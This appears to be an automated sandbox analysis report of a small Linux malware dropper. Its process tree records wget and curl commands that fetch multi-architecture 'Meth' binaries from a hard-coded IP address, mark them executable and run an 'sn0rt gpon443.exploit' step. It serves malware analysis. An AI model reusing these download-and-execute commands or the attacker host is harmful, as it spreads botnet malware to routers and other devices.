Analysis

  • max time kernel
    77s
  • max time network
    78s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240729-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    28-07-2024 03:58

General

  • Target

    084300db84b72d190951f7cca78ee9e3_JaffaCakes118

  • Size

    3KB

  • MD5

    084300db84b72d190951f7cca78ee9e3

  • SHA1

    a3a989180ea0ffa677ed97f1a3747c771caee062

  • SHA256

    d3e494fd077267d03723741a3278cd232b9aeea49533f4d218f3669a049be23f

  • SHA512

    ad0f90a8eb754101ce13fc19d18dc3d801aa297138aeb83b3e0e4ead97ec7c7d35b46e8834d2553385cad5bef0e8f281b5a6fdca8ce1a7a7bb4dac52eabcdef8

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 13 IoCs
  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
    /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:711
    • /usr/bin/wget
      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86
      2⤵
        PID:712
      • /usr/bin/curl
        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86
        2⤵
        • Reads runtime system information
        PID:717
      • /bin/cat
        cat Meth.x86
        2⤵
          PID:718
        • /bin/chmod
          chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq
          2⤵
            PID:719
          • /tmp/sn0rt
            ./sn0rt gpon443.exploit
            2⤵
            • Executes dropped EXE
            PID:720
          • /usr/bin/wget
            wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips
            2⤵
              PID:722
            • /usr/bin/curl
              curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips
              2⤵
              • Reads runtime system information
              PID:723
            • /bin/cat
              cat Meth.mips
              2⤵
                PID:724
              • /bin/chmod
                chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq
                2⤵
                  PID:725
                • /tmp/sn0rt
                  ./sn0rt gpon443.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:726
                • /usr/bin/wget
                  wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl
                  2⤵
                    PID:728
                  • /usr/bin/curl
                    curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl
                    2⤵
                    • Reads runtime system information
                    PID:729
                  • /bin/cat
                    cat Meth.mpsl
                    2⤵
                      PID:730
                    • /bin/chmod
                      chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq
                      2⤵
                        PID:731
                      • /tmp/sn0rt
                        ./sn0rt gpon443.exploit
                        2⤵
                        • Executes dropped EXE
                        PID:732
                      • /usr/bin/wget
                        wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm
                        2⤵
                          PID:734
                        • /usr/bin/curl
                          curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm
                          2⤵
                          • Reads runtime system information
                          PID:735
                        • /bin/cat
                          cat Meth.arm
                          2⤵
                            PID:736
                          • /bin/chmod
                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq
                            2⤵
                              PID:737
                            • /tmp/sn0rt
                              ./sn0rt gpon443.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:738
                            • /usr/bin/wget
                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5
                              2⤵
                                PID:740
                              • /usr/bin/curl
                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5
                                2⤵
                                • Reads runtime system information
                                PID:741
                              • /bin/cat
                                cat Meth.arm5
                                2⤵
                                  PID:742
                                • /bin/chmod
                                  chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq
                                  2⤵
                                    PID:743
                                  • /tmp/sn0rt
                                    ./sn0rt gpon443.exploit
                                    2⤵
                                    • Executes dropped EXE
                                    PID:744
                                  • /usr/bin/wget
                                    wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6
                                    2⤵
                                      PID:746
                                    • /usr/bin/curl
                                      curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6
                                      2⤵
                                      • Reads runtime system information
                                      PID:750
                                    • /bin/cat
                                      cat Meth.arm6
                                      2⤵
                                        PID:751
                                      • /bin/chmod
                                        chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                        2⤵
                                          PID:752
                                        • /tmp/sn0rt
                                          ./sn0rt gpon443.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:753
                                        • /usr/bin/wget
                                          wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7
                                          2⤵
                                            PID:755
                                          • /usr/bin/curl
                                            curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7
                                            2⤵
                                            • Reads runtime system information
                                            PID:756
                                          • /bin/cat
                                            cat Meth.arm7
                                            2⤵
                                              PID:757
                                            • /bin/chmod
                                              chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                              2⤵
                                                PID:758
                                              • /tmp/sn0rt
                                                ./sn0rt gpon443.exploit
                                                2⤵
                                                • Executes dropped EXE
                                                PID:759
                                              • /usr/bin/wget
                                                wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc
                                                2⤵
                                                  PID:761
                                                • /usr/bin/curl
                                                  curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc
                                                  2⤵
                                                  • Reads runtime system information
                                                  PID:762
                                                • /bin/cat
                                                  cat Meth.ppc
                                                  2⤵
                                                    PID:763
                                                  • /bin/chmod
                                                    chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                    2⤵
                                                      PID:764
                                                    • /tmp/sn0rt
                                                      ./sn0rt gpon443.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:765
                                                    • /usr/bin/wget
                                                      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k
                                                      2⤵
                                                        PID:767
                                                      • /usr/bin/curl
                                                        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k
                                                        2⤵
                                                        • Reads runtime system information
                                                        PID:768
                                                      • /bin/cat
                                                        cat Meth.m68k
                                                        2⤵
                                                          PID:769
                                                        • /bin/chmod
                                                          chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                          2⤵
                                                            PID:770
                                                          • /tmp/sn0rt
                                                            ./sn0rt gpon443.exploit
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:771
                                                          • /usr/bin/wget
                                                            wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc
                                                            2⤵
                                                              PID:773
                                                            • /usr/bin/curl
                                                              curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc
                                                              2⤵
                                                              • Reads runtime system information
                                                              PID:774
                                                            • /bin/cat
                                                              cat Meth.spc
                                                              2⤵
                                                                PID:775
                                                              • /bin/chmod
                                                                chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                                2⤵
                                                                  PID:776
                                                                • /tmp/sn0rt
                                                                  ./sn0rt gpon443.exploit
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:777
                                                                • /usr/bin/wget
                                                                  wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686
                                                                  2⤵
                                                                    PID:779
                                                                  • /usr/bin/curl
                                                                    curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686
                                                                    2⤵
                                                                    • Reads runtime system information
                                                                    PID:780
                                                                  • /bin/cat
                                                                    cat Meth.i686
                                                                    2⤵
                                                                      PID:781
                                                                    • /bin/chmod
                                                                      chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                                      2⤵
                                                                        PID:782
                                                                      • /tmp/sn0rt
                                                                        ./sn0rt gpon443.exploit
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:783
                                                                      • /usr/bin/wget
                                                                        wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4
                                                                        2⤵
                                                                          PID:785
                                                                        • /usr/bin/curl
                                                                          curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4
                                                                          2⤵
                                                                          • Reads runtime system information
                                                                          PID:786
                                                                        • /bin/cat
                                                                          cat Meth.sh4
                                                                          2⤵
                                                                            PID:787
                                                                          • /bin/chmod
                                                                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                                            2⤵
                                                                              PID:788
                                                                            • /tmp/sn0rt
                                                                              ./sn0rt gpon443.exploit
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:789
                                                                            • /usr/bin/wget
                                                                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc
                                                                              2⤵
                                                                                PID:791
                                                                              • /usr/bin/curl
                                                                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc
                                                                                2⤵
                                                                                • Reads runtime system information
                                                                                PID:792
                                                                              • /bin/cat
                                                                                cat Meth.arc
                                                                                2⤵
                                                                                  PID:793
                                                                                • /bin/chmod
                                                                                  chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                                                  2⤵
                                                                                    PID:794
                                                                                  • /tmp/sn0rt
                                                                                    ./sn0rt gpon443.exploit
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:795

                                                                                Network

                                                                                MITRE ATT&CK Matrix

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads